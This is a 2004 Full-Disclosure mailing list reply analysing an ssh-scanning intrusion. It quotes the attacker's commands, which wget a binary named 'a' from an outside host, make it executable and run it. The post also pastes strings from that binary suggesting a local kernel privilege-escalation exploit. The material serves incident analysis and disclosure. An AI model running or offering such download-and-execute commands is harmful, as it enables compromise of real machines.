Re: Betr.: RE: [Full-Disclosure] Automated ssh scanning

Todd Towles wrote:

> It could be, but he said it was patched. I didn't run the test of
> course.
>
> I never said it was the kernel however, it could be a service running.
> And unknown does not equal zero-day. But the tool got root and he
> doesn't know how. That is the point. Kernel, old service, whatever. It
> would be nice to find it.

If you take a look at this bit:

wget www.bo2k-rulez.net/a
chmod +x a
./a

The file "a" gives every superficial indication that it's a kernel
exploit, if you want to go by a 20-second Notepad analysis:

[-] Unable to exit, entering neverending loop.
                  Kernel seems not to be vulnerable double allocation
             Unable to determine kernel address Unable to set up LDT
      Unable to change page protection Invalid LDT entry Unable to jump
to call gate /bin/sh Unable to spawn shell
                    PATH=/usr/bin:/bin:/usr/sbin:/sbin Unable to
allocate memory Unable to unmap stack Unable to expand BSS
/proc/sys/kernel/osrelease FATAL: kernel too old
        FATAL: cannot determine library version
  /dev/null ;’;’(’„’Œ’ malloc: using
debugging hooks
   realloc(): invalid pointer %p!
  malloc: top chunk is corrupt
  Arena %d:
  system bytes = %10u
  in use bytes = %10u
  Total (incl. mmap):
  max mmap regions = %10u
  max mmap bytes = %10lu
  free(): invalid pointer %p!
  TOP_PAD_ MMAP_MAX_ TRIM_THRESHOLD_ MMAP_THRESHOLD_

                                                BB

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Received on Thu Aug 26 22:07:28 2004